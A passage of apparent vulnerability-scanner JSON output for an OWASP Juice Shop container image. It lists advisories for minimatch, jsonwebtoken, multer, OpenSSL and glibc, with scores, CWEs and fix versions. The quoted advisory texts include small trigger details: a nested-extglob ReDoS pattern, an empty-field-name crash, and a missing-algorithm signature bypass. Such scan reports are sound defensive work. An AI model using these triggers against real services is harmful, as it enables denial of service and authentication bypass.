issue.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-27903","epss":0.00499,"percentile":0.3861,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-27903","cwe":"CWE-407","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"minimatch","version":"3.0.5"}},"found":{"vulnerabilityID":"GHSA-7r86-cg39-jmmj","versionConstraint":"<3.1.3 (semantic)"},"fix":{"suggestedVersion":"3.1.3"}}],"artifact":{"id":"pkg:npm/minimatch@3.0.5?package-id=a7d9f58fa9223af7","name":"minimatch","version":"3.0.5","type":"npm","locations":[{"path":"/juice-shop/node_modules/replace/node_modules/minimatch/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:minimatch_project:minimatch:3.0.5:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/minimatch@3.0.5","upstreams":[]}},{"vulnerability":{"id":"GHSA-8cf7-32gw-wr33","dataSource":"https://github.com/advisories/GHSA-8cf7-32gw-wr33","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33","https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://nvd.nist.gov/vuln/detail/CVE-2022-23539","https://security.netapp.com/advisory/ntap-20240621-0007"],"description":"jsonwebtoken unrestricted key type could lead to legacy keys usage","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":8.1,"exploitabilityScore":2.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23539","epss":0.00479,"percentile":0.37424,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23539","cwe":"CWE-327","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["9.0.0"],"state":"fixed","available":[{"version":"9.0.0","date":"2022-12-23","kind":"first-observed"}]},"advisories":[],"risk":0.37362},"relatedVulnerabilities":[{"id":"CVE-2022-23539","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-23539","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33","https://security.netapp.com/advisory/ntap-20240621-0007/"],"description":"Versions `<=8.5.1` of `jsonwebtoken` library could be misconfigured so that legacy, insecure key types are used for signature verification. For example, DSA keys could be used with the RS256 algorithm. You are affected if you are using an algorithm and a key type other than a combination listed in the GitHub Security Advisory as unaffected. This issue has been fixed, please update to version 9.0.0. This version validates for asymmetric key type and algorithm combinations. Please refer to the above mentioned algorithm / key type combinations for the valid secure configuration. After updating to version 9.0.0, if you still intend to continue with signing or verifying tokens using invalid key type/algorithm value combinations, you’ll need to set the `allowInvalidAsymmetricKeyTypes` option to `true` in the `sign()` and/or `verify()` functions.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":8.1,"exploitabilityScore":2.9,"impactScore":5.2},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N","metrics":{"baseScore":5.9,"exploitabilityScore":1.7,"impactScore":4.3},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23539","epss":0.00479,"percentile":0.37424,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23539","cwe":"CWE-327","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jsonwebtoken","version":"0.1.0"}},"found":{"vulnerabilityID":"GHSA-8cf7-32gw-wr33","versionConstraint":"<=8.5.1 (semantic)"},"fix":{"suggestedVersion":"9.0.0"}}],"artifact":{"id":"pkg:npm/jsonwebtoken@0.1.0?package-id=c29669d438fb9e38","name":"jsonwebtoken","version":"0.1.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:auth0:jsonwebtoken:0.1.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/jsonwebtoken@0.1.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-8cf7-32gw-wr33","dataSource":"https://github.com/advisories/GHSA-8cf7-32gw-wr33","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33","https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://nvd.nist.gov/vuln/detail/CVE-2022-23539","https://security.netapp.com/advisory/ntap-20240621-0007"],"description":"jsonwebtoken unrestricted key type could lead to legacy keys usage","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":8.1,"exploitabilityScore":2.9,"impactScore":5.2},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23539","epss":0.00479,"percentile":0.37424,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23539","cwe":"CWE-327","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["9.0.0"],"state":"fixed","available":[{"version":"9.0.0","date":"2022-12-23","kind":"first-observed"}]},"advisories":[],"risk":0.37362},"relatedVulnerabilities":[{"id":"CVE-2022-23539","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-23539","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-8cf7-32gw-wr33","https://security.netapp.com/advisory/ntap-20240621-0007/"],"description":"Versions `<=8.5.1` of `jsonwebtoken` library could be misconfigured so that legacy, insecure key types are used for signature verification. For example, DSA keys could be used with the RS256 algorithm. You are affected if you are using an algorithm and a key type other than a combination listed in the GitHub Security Advisory as unaffected. This issue has been fixed, please update to version 9.0.0. This version validates for asymmetric key type and algorithm combinations. Please refer to the above mentioned algorithm / key type combinations for the valid secure configuration. After updating to version 9.0.0, if you still intend to continue with signing or verifying tokens using invalid key type/algorithm value combinations, you’ll need to set the `allowInvalidAsymmetricKeyTypes` option to `true` in the `sign()` and/or `verify()` functions.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N","metrics":{"baseScore":8.1,"exploitabilityScore":2.9,"impactScore":5.2},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:N","metrics":{"baseScore":5.9,"exploitabilityScore":1.7,"impactScore":4.3},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23539","epss":0.00479,"percentile":0.37424,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23539","cwe":"CWE-327","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jsonwebtoken","version":"0.4.0"}},"found":{"vulnerabilityID":"GHSA-8cf7-32gw-wr33","versionConstraint":"<=8.5.1 (semantic)"},"fix":{"suggestedVersion":"9.0.0"}}],"artifact":{"id":"pkg:npm/jsonwebtoken@0.4.0?package-id=1e23bc54c16fbe6d","name":"jsonwebtoken","version":"0.4.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/jsonwebtoken/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:auth0:jsonwebtoken:0.4.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/jsonwebtoken@0.4.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-23c5-xmqv-rm74","dataSource":"https://github.com/advisories/GHSA-23c5-xmqv-rm74","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74","https://nvd.nist.gov/vuln/detail/CVE-2026-27904","https://github.com/isaacs/minimatch/commit/11d0df6165d15a955462316b26d52e5efae06fce"],"description":"minimatch ReDoS: nested *() extglobs generate catastrophically backtracking regular expressions","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-27904","epss":0.00455,"percentile":0.35931,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-27904","cwe":"CWE-1333","source":"security-advisories@github.com","type":"Primary"}],"fix":{"versions":["3.1.4"],"state":"fixed","available":[{"version":"3.1.4","date":"2026-02-27","kind":"first-observed"}]},"advisories":[],"risk":0.34125},"relatedVulnerabilities":[{"id":"CVE-2026-27904","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-27904","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/isaacs/minimatch/security/advisories/GHSA-23c5-xmqv-rm74"],"description":"minimatch is a minimal matching utility for converting glob expressions into JavaScript RegExp objects. Prior to version 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4, nested `*()` extglobs produce regexps with nested unbounded quantifiers (e.g. `(?:(?:a|b)*)*`), which exhibit catastrophic backtracking in V8. With a 12-byte pattern `*(*(*(a|b)))` and an 18-byte non-matching input, `minimatch()` stalls for over 7 seconds. Adding a single nesting level or a few input characters pushes this to minutes. This is the most severe finding: it is triggered by the default `minimatch()` API with no special options, and the minimum viable pattern is only 12 bytes. The same issue affects `+()` extglobs equally. Versions 10.2.3, 9.0.7, 8.0.6, 7.4.8, 6.2.2, 5.1.8, 4.2.5, and 3.1.4 fix the issue.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":7.5,"exploitabilityScore":3.9,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-27904","epss":0.00455,"percentile":0.35931,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-27904","cwe":"CWE-1333","source":"security-advisories@github.com","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"minimatch","version":"3.0.5"}},"found":{"vulnerabilityID":"GHSA-23c5-xmqv-rm74","versionConstraint":"<3.1.4 (semantic)"},"fix":{"suggestedVersion":"3.1.4"}}],"artifact":{"id":"pkg:npm/minimatch@3.0.5?package-id=a7d9f58fa9223af7","name":"minimatch","version":"3.0.5","type":"npm","locations":[{"path":"/juice-shop/node_modules/replace/node_modules/minimatch/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["ISC"],"cpes":["cpe:2.3:a:minimatch_project:minimatch:3.0.5:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/minimatch@3.0.5","upstreams":[]}},{"vulnerability":{"id":"CVE-2026-42766","dataSource":"https://security-tracker.debian.org/tracker/CVE-2026-42766","namespace":"debian:distro:debian:13","severity":"Medium","urls":[],"description":"Issue summary: A specially crafted password-encrypted CMS message can trigger a NULL pointer dereference during CMS decryption. Impact summary: This NULL pointer dereference leads to an application crash and a Denial of Service. The CMS PasswordRecipientInfo.keyDerivationAlgorithm field is defined as OPTIONAL in the ASN.1 specification and may therefore be absent in specially crafted inputs. During the password-based CMS decryption the OpenSSL CMS implementation dereferences this field without first checking whether it was present. An attacker who supplies such a CMS message to an application performing password-based CMS decryption can trigger an application crash, leading to a Denial of Service. Applications that process password-encrypted CMS messages may be affected. The FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this issue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":5.9,"exploitabilityScore":2.3,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42766","epss":0.00587,"percentile":0.43279,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42766","cwe":"CWE-476","source":"openssl-security@openssl.org","type":"Secondary"}],"fix":{"versions":["3.5.6-1~deb13u2"],"state":"fixed","available":[{"version":"3.5.6-1~deb13u2","date":"2026-06-09","kind":"advisory"}]},"advisories":[{"id":"DSA-6335-1","link":"https://security-tracker.debian.org/tracker/DSA-6335-1"}],"risk":0.31991500000000006},"relatedVulnerabilities":[{"id":"CVE-2026-42766","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2026-42766","namespace":"nvd:cpe","severity":"Medium","urls":["https://github.com/openssl/openssl/commit/056d06c1918fafbb98c1c85a02e4c47cc4e199ce","https://github.com/openssl/openssl/commit/12bc26ffb3a2be728c9b86e1cae277de5b33dfa4","https://github.com/openssl/openssl/commit/3ff64913615d648cfbb6a6f1cf5529ae7ea829d7","https://github.com/openssl/openssl/commit/ab52d88cb5374876d59aee3c91f9e4ccce2b7ce4","https://github.com/openssl/openssl/commit/da26f368732b83e40e9d356fe61c3d3aaab6d2e8","https://openssl-library.org/news/secadv/20260609.txt"],"description":"Issue summary: A specially crafted password-encrypted CMS message\ncan trigger a NULL pointer dereference during CMS decryption.\n\nImpact summary: This NULL pointer dereference leads to an application crash\nand a Denial of Service.\n\nThe CMS PasswordRecipientInfo.keyDerivationAlgorithm field is defined as\nOPTIONAL in the ASN.1 specification and may therefore be absent in specially\ncrafted inputs. During the password-based CMS decryption the OpenSSL\nCMS implementation dereferences this field without first checking whether it\nwas present.\n\nAn attacker who supplies such a CMS message to an application performing\npassword-based CMS decryption can trigger an application crash, leading to\na Denial of Service.\n\nApplications that process password-encrypted CMS messages may be affected.\n\nThe FIPS modules in 4.0, 3.6, 3.5, 3.4, and 3.0 are not affected by this\nissue, as the affected code is outside the OpenSSL FIPS module boundary.","cvss":[{"source":"134c704f-9b21-4f2e-91b3-4a467353bcc0","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H","metrics":{"baseScore":5.9,"exploitabilityScore":2.3,"impactScore":3.6},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2026-42766","epss":0.00587,"percentile":0.43279,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2026-42766","cwe":"CWE-476","source":"openssl-security@openssl.org","type":"Secondary"}]}],"matchDetails":[{"type":"exact-indirect-match","matcher":"dpkg-matcher","searchedBy":{"distro":{"type":"debian","version":"13"},"package":{"name":"openssl","version":"3.5.5-1~deb13u2"},"namespace":"debian:distro:debian:13"},"found":{"vulnerabilityID":"CVE-2026-42766","versionConstraint":"< 3.5.6-1~deb13u2 (deb)"},"fix":{"suggestedVersion":"3.5.6-1~deb13u2"}}],"artifact":{"id":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&package-id=d839547e5a6a801d&upstream=openssl","name":"libssl3t64","version":"3.5.5-1~deb13u2","type":"deb","locations":[{"path":"/usr/share/doc/libssl3t64/copyright","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""},{"path":"/var/lib/dpkg/status.d/libssl3t64.md5sums","layerID":"sha256:1a6e423bca2d12ae8428c7b3a06be964f6166ecd4d90d8d30bfcc99c40740dc7","accessPath":""}],"language":"","licenses":["Apache-2.0","Artistic","GPL-1.0-only","GPL-1.0-or-later"],"cpes":["cpe:2.3:a:libssl3t64:libssl3t64:3.5.5-1\\~deb13u2:*:*:*:*:*:*:*"],"purl":"pkg:deb/debian/libssl3t64@3.5.5-1~deb13u2?arch=amd64&distro=debian-13&upstream=openssl","upstreams":[{"name":"openssl"}]}},{"vulnerability":{"id":"GHSA-qwph-4952-7xr6","dataSource":"https://github.com/advisories/GHSA-qwph-4952-7xr6","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6","https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://nvd.nist.gov/vuln/detail/CVE-2022-23540","https://security.netapp.com/advisory/ntap-20240621-0007"],"description":"jsonwebtoken vulnerable to signature validation bypass due to insecure default algorithm in jwt.verify()","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L","metrics":{"baseScore":6.4,"exploitabilityScore":1.7,"impactScore":4.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23540","epss":0.00532,"percentile":0.40523,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23540","cwe":"CWE-287","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23540","cwe":"CWE-347","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["9.0.0"],"state":"fixed","available":[{"version":"9.0.0","date":"2022-12-23","kind":"first-observed"}]},"advisories":[],"risk":0.30324},"relatedVulnerabilities":[{"id":"CVE-2022-23540","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-23540","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6","https://security.netapp.com/advisory/ntap-20240621-0007/"],"description":"In versions `<=8.5.1` of `jsonwebtoken` library, lack of algorithm definition in the `jwt.verify()` function can lead to signature validation bypass due to defaulting to the `none` algorithm for signature verification. Users are affected if you do not specify algorithms in the `jwt.verify()` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the `jwt.verify()` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the `none` algorithm. If you need 'none' algorithm, you have to explicitly specify that in `jwt.verify()` options.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L","metrics":{"baseScore":7.6,"exploitabilityScore":2.9,"impactScore":4.8},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L","metrics":{"baseScore":6.4,"exploitabilityScore":1.7,"impactScore":4.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23540","epss":0.00532,"percentile":0.40523,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23540","cwe":"CWE-287","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23540","cwe":"CWE-347","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jsonwebtoken","version":"0.1.0"}},"found":{"vulnerabilityID":"GHSA-qwph-4952-7xr6","versionConstraint":"<9.0.0 (semantic)"},"fix":{"suggestedVersion":"9.0.0"}}],"artifact":{"id":"pkg:npm/jsonwebtoken@0.1.0?package-id=c29669d438fb9e38","name":"jsonwebtoken","version":"0.1.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/express-jwt/node_modules/jsonwebtoken/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:auth0:jsonwebtoken:0.1.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/jsonwebtoken@0.1.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-qwph-4952-7xr6","dataSource":"https://github.com/advisories/GHSA-qwph-4952-7xr6","namespace":"github:language:javascript","severity":"Medium","urls":["https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6","https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://nvd.nist.gov/vuln/detail/CVE-2022-23540","https://security.netapp.com/advisory/ntap-20240621-0007"],"description":"jsonwebtoken vulnerable to signature validation bypass due to insecure default algorithm in jwt.verify()","cvss":[{"type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L","metrics":{"baseScore":6.4,"exploitabilityScore":1.7,"impactScore":4.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23540","epss":0.00532,"percentile":0.40523,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23540","cwe":"CWE-287","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23540","cwe":"CWE-347","source":"nvd@nist.gov","type":"Primary"}],"fix":{"versions":["9.0.0"],"state":"fixed","available":[{"version":"9.0.0","date":"2022-12-23","kind":"first-observed"}]},"advisories":[],"risk":0.30324},"relatedVulnerabilities":[{"id":"CVE-2022-23540","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2022-23540","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/auth0/node-jsonwebtoken/commit/e1fa9dcc12054a8681db4e6373da1b30cf7016e3","https://github.com/auth0/node-jsonwebtoken/security/advisories/GHSA-qwph-4952-7xr6","https://security.netapp.com/advisory/ntap-20240621-0007/"],"description":"In versions `<=8.5.1` of `jsonwebtoken` library, lack of algorithm definition in the `jwt.verify()` function can lead to signature validation bypass due to defaulting to the `none` algorithm for signature verification. Users are affected if you do not specify algorithms in the `jwt.verify()` function. This issue has been fixed, please update to version 9.0.0 which removes the default support for the none algorithm in the `jwt.verify()` method. There will be no impact, if you update to version 9.0.0 and you don’t need to allow for the `none` algorithm. If you need 'none' algorithm, you have to explicitly specify that in `jwt.verify()` options.","cvss":[{"source":"nvd@nist.gov","type":"Primary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:H/A:L","metrics":{"baseScore":7.6,"exploitabilityScore":2.9,"impactScore":4.8},"vendorMetadata":{}},{"source":"security-advisories@github.com","type":"Secondary","version":"3.1","vector":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:H/A:L","metrics":{"baseScore":6.4,"exploitabilityScore":1.7,"impactScore":4.8},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2022-23540","epss":0.00532,"percentile":0.40523,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2022-23540","cwe":"CWE-287","source":"security-advisories@github.com","type":"Secondary"},{"cve":"CVE-2022-23540","cwe":"CWE-347","source":"nvd@nist.gov","type":"Primary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"jsonwebtoken","version":"0.4.0"}},"found":{"vulnerabilityID":"GHSA-qwph-4952-7xr6","versionConstraint":"<9.0.0 (semantic)"},"fix":{"suggestedVersion":"9.0.0"}}],"artifact":{"id":"pkg:npm/jsonwebtoken@0.4.0?package-id=1e23bc54c16fbe6d","name":"jsonwebtoken","version":"0.4.0","type":"npm","locations":[{"path":"/juice-shop/node_modules/jsonwebtoken/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:auth0:jsonwebtoken:0.4.0:*:*:*:*:node.js:*:*"],"purl":"pkg:npm/jsonwebtoken@0.4.0","upstreams":[]}},{"vulnerability":{"id":"GHSA-g5hg-p3ph-g8qg","dataSource":"https://github.com/advisories/GHSA-g5hg-p3ph-g8qg","namespace":"github:language:javascript","severity":"High","urls":["https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg","https://nvd.nist.gov/vuln/detail/CVE-2025-48997","https://github.com/expressjs/multer/issues/1233","https://github.com/expressjs/multer/pull/1256","https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9"],"description":"Multer vulnerable to Denial of Service via unhandled exception","cvss":[{"type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-48997","epss":0.00368,"percentile":0.28381,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-48997","cwe":"CWE-248","source":"security-advisories@github.com","type":"Secondary"}],"fix":{"versions":["2.0.1"],"state":"fixed","available":[{"version":"2.0.1","date":"2025-06-05","kind":"first-observed"}]},"advisories":[],"risk":0.29808},"relatedVulnerabilities":[{"id":"CVE-2025-48997","dataSource":"https://nvd.nist.gov/vuln/detail/CVE-2025-48997","namespace":"nvd:cpe","severity":"High","urls":["https://github.com/expressjs/multer/commit/35a3272b611945155e046dd5cef11088587635e9","https://github.com/expressjs/multer/issues/1233","https://github.com/expressjs/multer/pull/1256","https://github.com/expressjs/multer/security/advisories/GHSA-g5hg-p3ph-g8qg"],"description":"Multer is a node.js middleware for handling `multipart/form-data`. A vulnerability that is present starting in version 1.4.4-lts.1 and prior to version 2.0.1 allows an attacker to trigger a Denial of Service (DoS) by sending an upload file request with an empty string field name. This request causes an unhandled exception, leading to a crash of the process. Users should upgrade to `2.0.1` to receive a patch. No known workarounds are available.","cvss":[{"source":"security-advisories@github.com","type":"Secondary","version":"4.0","vector":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X","metrics":{"baseScore":8.7},"vendorMetadata":{}}],"epss":[{"cve":"CVE-2025-48997","epss":0.00368,"percentile":0.28381,"date":"2026-06-16"}],"cwes":[{"cve":"CVE-2025-48997","cwe":"CWE-248","source":"security-advisories@github.com","type":"Secondary"}]}],"matchDetails":[{"type":"exact-direct-match","matcher":"javascript-matcher","searchedBy":{"language":"javascript","namespace":"github:language:javascript","package":{"name":"multer","version":"1.4.5-lts.2"}},"found":{"vulnerabilityID":"GHSA-g5hg-p3ph-g8qg","versionConstraint":">=1.4.4-lts.1,<2.0.1 (semantic)"},"fix":{"suggestedVersion":"2.0.1"}}],"artifact":{"id":"pkg:npm/multer@1.4.5-lts.2?package-id=cce9b5dd2cb3fe54","name":"multer","version":"1.4.5-lts.2","type":"npm","locations":[{"path":"/juice-shop/node_modules/multer/package.json","layerID":"sha256:f4bb7ec73c07ef3ba9e341c378fc380442a5e7d2dcc7cab9ff556e2bbca7b5ed","accessPath":""}],"language":"javascript","licenses":["MIT"],"cpes":["cpe:2.3:a:multer:multer:1.4.5-lts.2:*:*:*:*:*:*:*"],"purl":"pkg:npm/multer@1.4.5-lts.2","upstreams":[]}},{"vulnerability":{"id":"CVE-2018-20796","dataSource":"https://security-tracker.debian.org/tracker/CVE-2018-20796","namespace":"debian:distro:debian:13","severity":"Negligible","urls":[],"description":"In the GNU C Library (aka glibc or libc6) through 2.29, check_dst_limits_calc_pos_1 in posix/regexec.c has Uncontrolled Recursion, as demonstrated by '(\\227|)(\\\\1\\\\1|t1|\\\\\\2537)+' in 